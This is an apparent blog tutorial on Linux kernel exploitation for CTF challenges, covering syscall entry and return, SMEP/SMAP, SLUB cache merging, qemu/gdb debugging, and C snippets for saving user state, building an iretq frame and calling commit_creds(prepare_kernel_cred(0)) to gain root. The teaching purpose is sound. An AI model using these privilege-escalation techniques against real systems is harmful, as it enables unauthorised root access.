Posts List
  1. Background
  2. Analyse
    1. Basic Knowledge
    2. File struct
    3. Mitigation
  3. Debug
  4. Basic Exploit

Introduction to Linux Kernel Pwn

Background

Linux kernel pwn is a category of CTF pwn challenges. Unlike ordinary user-space challenges, which we usually solve with Python, kernel exploits are usually written in C. Since I'm just getting started with it, I want to write down what I've learned.

Analyse

Basic Knowledge

User space to Kernel space

  1. Switch the GS segment register with swapgs. The instruction exchanges the current GS base with a value stored in a dedicated location (the IA32_KERNEL_GS_BASE MSR), so the user-space GS value is saved and the kernel runs with its own GS value.
  2. Save the current stack pointer (the top of the user-space stack) in a per-CPU variable, then load the kernel stack top recorded in the per-CPU area into rsp (esp).
  3. Push the register values onto the kernel stack to build struct pt_regs. The code is as follows:

ENTRY(entry_SYSCALL_64)
/*
* Interrupts are off on entry.
* We do not frame this tiny irq-off block with TRACE_IRQS_OFF/ON,
* it is too small to ever cause noticeable irq latency.
*/
SWAPGS_UNSAFE_STACK
/*
* A hypervisor implementation might want to use a label
* after the swapgs, so that it can do the swapgs
* for the guest and jump here on syscall.
*/
GLOBAL(entry_SYSCALL_64_after_swapgs)

movq %rsp, PER_CPU_VAR(rsp_scratch)
movq PER_CPU_VAR(cpu_current_top_of_stack), %rsp

TRACE_IRQS_OFF

/* Construct struct pt_regs on stack */
pushq $__USER_DS /* pt_regs->ss */
pushq PER_CPU_VAR(rsp_scratch) /* pt_regs->sp */
pushq %r11 /* pt_regs->flags */
pushq $__USER_CS /* pt_regs->cs */
pushq %rcx /* pt_regs->ip */
pushq %rax /* pt_regs->orig_ax */
pushq %rdi /* pt_regs->di */
pushq %rsi /* pt_regs->si */
pushq %rdx /* pt_regs->dx */
pushq %rcx /* pt_regs->cx */
pushq $-ENOSYS /* pt_regs->ax */
pushq %r8 /* pt_regs->r8 */
pushq %r9 /* pt_regs->r9 */
pushq %r10 /* pt_regs->r10 */
pushq %r11 /* pt_regs->r11 */
sub $(6*8), %rsp /* pt_regs->bp, bx, r12-15 not saved */
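
The frame built by these pushes can be mirrored in user-space C to see where each saved register ends up. This is only a sketch: the name pt_regs_sketch and the two helper functions are illustrative, and the field order is the x86_64 struct pt_regs order implied by the comments in the listing above (last push at the lowest address).

```c
#include <stddef.h>
#include <stdint.h>

/* User-space mirror of the register frame built by the pushes above.
 * Fields run from the lowest address (pushed last) to the highest
 * (pushed first). The name pt_regs_sketch is illustrative only. */
struct pt_regs_sketch {
    uint64_t r15, r14, r13, r12, bp, bx; /* the 6*8 bytes reserved by "sub" */
    uint64_t r11, r10, r9, r8;
    uint64_t ax, cx, dx, si, di;
    uint64_t orig_ax;                    /* syscall number taken from %rax */
    uint64_t ip, cs, flags, sp, ss;      /* user context saved on entry */
};

/* Byte offset of the saved user instruction pointer inside the frame. */
size_t saved_ip_offset(void)
{
    return offsetof(struct pt_regs_sketch, ip);
}

/* Total size of the frame in bytes (21 registers of 8 bytes each). */
size_t frame_size(void)
{
    return sizeof(struct pt_regs_sketch);
}
```

The last five fields (ip, cs, flags, sp, ss) are the values that have to be restored when returning to user space.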

Kernel space return to User space

  1. Restore the user-space GS value with swapgs.
  2. Return to user space with sysretq or iretq. If you use iretq, you must also supply the user-space context on the stack: the return address (RIP), the CS value, the RFLAGS value, the user stack pointer, and the SS value.

For example:

push $SS_USER_VALUE
push $USERLAND_STACK
push $USERLAND_EFLAGS
push $CS_USER_VALUE
push $USERLAND_FUNCTION_ADDRESS
swapgs
iretq
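
In an exploit written in C, the placeholder values above are usually captured from the running process before the bug is triggered. The following is a minimal sketch, assuming an x86_64 target and GCC-style inline assembly. The names save_state, build_iret_frame and the user_* globals are my own, not from any library.

```c
#include <stdint.h>

/* Saved user-space context, captured before triggering the bug. */
uint64_t user_cs, user_ss, user_rflags, user_sp;

/* Record the current user-mode selectors, flags and stack pointer.
 * The assembly is x86_64 only, so other architectures compile a no-op. */
void save_state(void)
{
#if defined(__x86_64__)
    __asm__ volatile(
        "lea -128(%%rsp), %%rsp\n\t" /* step over the red zone before pushing */
        "mov %%cs, %0\n\t"
        "mov %%ss, %1\n\t"
        "pushfq\n\t"
        "popq %2\n\t"
        "lea 128(%%rsp), %%rsp\n\t"  /* restore the original stack pointer */
        "mov %%rsp, %3\n\t"
        : "=r"(user_cs), "=r"(user_ss), "=r"(user_rflags), "=r"(user_sp)
        :
        : "memory");
#endif
}

/* Fill frame[0..4] in the order iretq pops them: RIP, CS, RFLAGS, RSP, SS.
 * This is the reverse of the push order shown above. */
void build_iret_frame(uint64_t frame[5], uint64_t user_rip)
{
    frame[0] = user_rip;
    frame[1] = user_cs;
    frame[2] = user_rflags;
    frame[3] = user_sp;
    frame[4] = user_ss;
}
```

Call save_state() at the start of main(), then place the five values from build_iret_frame() on the kernel stack (for example at the end of a ROP chain) right before swapgs and iretq.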

File struct

In a CTF kernel challenge, we are usually given these files:

boot.sh -- a bash script to start Kernel (basically using qemu)
bzImage -- Kernel binary
rootfs.cpio -- an archive of the root filesystem, including the .ko file, /etc, /bin, /sys, etc.

In most cases, we need to analyse the .ko file, which is a Linux kernel module. Inserting a module into the kernel dynamically loads driver code that either talks to hardware or provides some software functionality at the kernel layer. The module runs in kernel space and is usually reached from user space through a device file; many of the files under /dev/ are device files. The module defines its own handlers for operations such as open and close and registers them when it is loaded, so calling open, close, etc. on the device file from user space invokes the corresponding handlers in the module. In this way a series of operations is carried out in the kernel on behalf of user space.
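
From the user-space side, talking to a module is ordinary file I/O on its device file. A minimal sketch follows; the helper names open_device and close_device are made up for illustration, and the device path depends entirely on the challenge module.

```c
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

/* Open a device file exposed by a kernel module.
 * Returns the file descriptor, or -1 if the device cannot be opened. */
int open_device(const char *path)
{
    int fd = open(path, O_RDWR); /* dispatched to the module's open handler */
    if (fd < 0)
        perror("open");
    return fd;
}

/* Close the descriptor; the kernel then calls the module's release handler. */
int close_device(int fd)
{
    return close(fd);
}
```

An exploit typically starts with something like open_device("/dev/<name>"), where the name is whatever the module registers, and then drives the bug through read, write or ioctl calls on the returned descriptor.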

Mitigation

Kernel-space mitigations are largely the same as in user space, such as ASLR (KASLR in the kernel), stack canaries, and DEP. But there are some differences.

The kernel has a mitigation called SMEP (Supervisor Mode Execution Prevention). It stops an attacker who has hijacked kernel control flow from redirecting it to user-space code, which would then run in ring 0 and could escalate privileges. When SMEP is on, the CPU faults instead of executing user-space code in ring 0. This is a CPU feature controlled by one bit of the CR4 register (bit 20). However, SMEP does not prevent the kernel from accessing user-space data; it only prevents the execution of user-space code.

SMAP (Supervisor Mode Access Prevention) is similar to SMEP: it prevents ring 0 code from reading or writing user-space data. It is also controlled by a bit in CR4 (bit 21).
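
Whether the two protections are on can be read from a CR4 value, for example one taken from a kernel oops or from gdb. The sketch below assumes the x86 bit positions (SMEP is CR4 bit 20, SMAP is bit 21); the function names are illustrative.

```c
#include <stdint.h>

#define CR4_SMEP (1ULL << 20) /* Supervisor Mode Execution Prevention */
#define CR4_SMAP (1ULL << 21) /* Supervisor Mode Access Prevention */

/* Return 1 if the SMEP bit is set in the given CR4 value, else 0. */
int smep_enabled(uint64_t cr4)
{
    return (cr4 & CR4_SMEP) != 0;
}

/* Return 1 if the SMAP bit is set in the given CR4 value, else 0. */
int smap_enabled(uint64_t cr4)
{
    return (cr4 & CR4_SMAP) != 0;
}

/* The CR4 value with both protection bits cleared. */
uint64_t cr4_without_smep_smap(uint64_t cr4)
{
    return cr4 & ~(CR4_SMEP | CR4_SMAP);
}
```

For a sample value such as 0x3006f0 both bits are set, and clearing them leaves 0x6f0.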

Memory allocation is also required in kernel space. Instead of malloc, the kernel uses kmalloc, which is backed by a slab or SLUB allocator; SLUB is now the more common one. The allocator is organised as a multi-level structure. At the top is the cache layer. Each cache is a structure that tracks its slabs in three groups: empty, partially used, and full. Objects are memory objects, that is, pieces of kernel memory that have been or will be allocated. kmalloc uses multiple caches, each serving objects of one fixed size, and most of those sizes are powers of two.

The slab allocator keeps caches strictly separate: objects from different caches are never placed on the same page. The SLUB allocator is looser: caches whose objects have the same size may be merged, so objects belonging to different caches can end up on the same page. This point is very important, and the basic exploit relies on it.
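
To reason about which kmalloc cache a request lands in, a small lookup helps. This is a sketch under an assumption: the size list below is what a typical x86_64 SLUB build provides (powers of two plus 96 and 192), and the function name is made up. /proc/slabinfo on the target is the authoritative source.

```c
#include <stddef.h>

/* Assumed general-purpose kmalloc cache sizes (typical x86_64 SLUB build). */
static const size_t kmalloc_sizes[] = {
    8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096, 8192
};

/* Return the object size of the smallest assumed cache that fits `request`,
 * or 0 if the request is zero or larger than every listed cache. */
size_t kmalloc_cache_size(size_t request)
{
    size_t count = sizeof(kmalloc_sizes) / sizeof(kmalloc_sizes[0]);

    if (request == 0)
        return 0;
    for (size_t i = 0; i < count; i++) {
        if (request <= kmalloc_sizes[i])
            return kmalloc_sizes[i];
    }
    return 0;
}
```

Under these assumptions, a 100-byte request is served from the 128-byte cache, so it shares a cache with any other object whose size falls between 97 and 128 bytes.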

Debug

First we need to unpack the .cpio archive:

mkdir initframs && cp test.cpio initframs && cd initframs
cpio -idmv < test.cpio

Now we can find the .ko file and load it into IDA to analyse it.

Then we copy our exploit (exp) into initframs and repack the archive:

find ./* | cpio -H newc -o > test.cpio

After that, when we start the kernel, exp will be present in the filesystem.

Start the kernel with the -s parameter, for example:

qemu-system-x86_64 \
-m 256M \
-kernel ./bzImage \
-initrd ./core.cpio \
-append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet kaslr" \
-netdev user,id=t0 -device e1000,netdev=t0,id=nic0 \
-nographic \
-s

Then we can attach gdb to the kernel (the -s option makes QEMU listen for gdb on TCP port 1234):

target remote tcp::1234

Some useful commands inside the guest:

lsmod -- list addresses of loaded modules
cat /proc/kallsyms -- get addresses of all symbols in Kernel
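
Since the exploit itself is written in C, it can also look symbols up on its own instead of relying on cat. A minimal sketch, assuming the usual "address type name" line format of /proc/kallsyms; the function names are illustrative, and the addresses read back as zero when the kernel hides them from unprivileged users.

```c
#include <stdio.h>
#include <string.h>

/* Parse one kallsyms-style line: "<hex address> <type> <name> [module]".
 * Returns 1 and stores the address if the line describes `wanted`, else 0. */
int parse_kallsyms_line(const char *line, const char *wanted,
                        unsigned long long *addr)
{
    unsigned long long value;
    char type;
    char name[256];

    if (sscanf(line, "%llx %c %255s", &value, &type, name) != 3)
        return 0;
    if (strcmp(name, wanted) != 0)
        return 0;
    *addr = value;
    return 1;
}

/* Scan a kallsyms-format file for `wanted`.
 * Returns the address, or 0 if the file is unreadable or has no such symbol. */
unsigned long long find_symbol(const char *path, const char *wanted)
{
    char line[512];
    unsigned long long addr = 0;
    FILE *fp = fopen(path, "r");

    if (!fp)
        return 0;
    while (fgets(line, sizeof(line), fp)) {
        if (parse_kallsyms_line(line, wanted, &addr))
            break;
    }
    fclose(fp);
    return addr;
}
```

For example, find_symbol("/proc/kallsyms", "commit_creds") returns the address of commit_creds when the file is readable and addresses are not masked.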

Basic Exploit

Since the kernel manages running processes, it also keeps track of their permissions (credentials).

Conveniently, the Linux kernel provides helper functions for creating and updating process credentials.

From the Linux kernel source code:

struct task_struct {
...
/* Process credentials: */

/* Tracer's credentials at attach: */
const struct cred __rcu *ptracer_cred;

/* Objective and real subjective task credentials (COW): */
const struct cred __rcu *real_cred;

/* Effective (overridable) subjective task credentials (COW): */
const struct cred __rcu *cred;
...
};

struct cred *prepare_kernel_cred(struct task_struct *daemon)
{
const struct cred *old;
struct cred *new;
...
}

int commit_creds(struct cred *new)
{
struct task_struct *task = current;
const struct cred *old = task->real_cred;
...
}

Therefore, we can:

  1. Create a root struct cred by calling prepare_kernel_cred(0).
  2. Call commit_creds() with that cred to set the credentials of the current process to root.
  3. Return to user space with swapgs and iretq, then call system("/bin/sh").
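
Steps 1 and 2 can be sketched as calls through function pointers, because the addresses of the two kernel functions are only known at run time (for example from /proc/kallsyms). This is a rehearsal sketch, not a working exploit: the signatures are simplified to void pointers, and the stub_* functions are hypothetical user-space stand-ins so the call sequence can be compiled and checked outside the kernel.

```c
#include <stddef.h>

/* Simplified signatures; the real kernel types are struct cred * and
 * struct task_struct *. */
typedef void *(*prepare_kernel_cred_fn)(void *daemon);
typedef int (*commit_creds_fn)(void *new_cred);

/* Set these to the resolved kernel addresses before the payload runs. */
prepare_kernel_cred_fn prepare_kernel_cred_ptr;
commit_creds_fn commit_creds_ptr;

/* Steps 1 and 2: in a real exploit this body must execute in ring 0. */
int escalate_privileges(void)
{
    void *root_cred = prepare_kernel_cred_ptr(NULL); /* step 1 */
    return commit_creds_ptr(root_cred);              /* step 2 */
}

/* Hypothetical stand-ins for a user-space dry run of the call sequence. */
int stub_cred_marker;
void *last_committed;

void *stub_prepare_kernel_cred(void *daemon)
{
    (void)daemon;
    return &stub_cred_marker;
}

int stub_commit_creds(void *new_cred)
{
    last_committed = new_cred; /* remember what would have been committed */
    return 0;
}
```

In a dry run, point both pointers at the stubs and call escalate_privileges(). In the real exploit they hold kernel addresses, and step 3 (swapgs, iretq, then system("/bin/sh")) follows once the call returns.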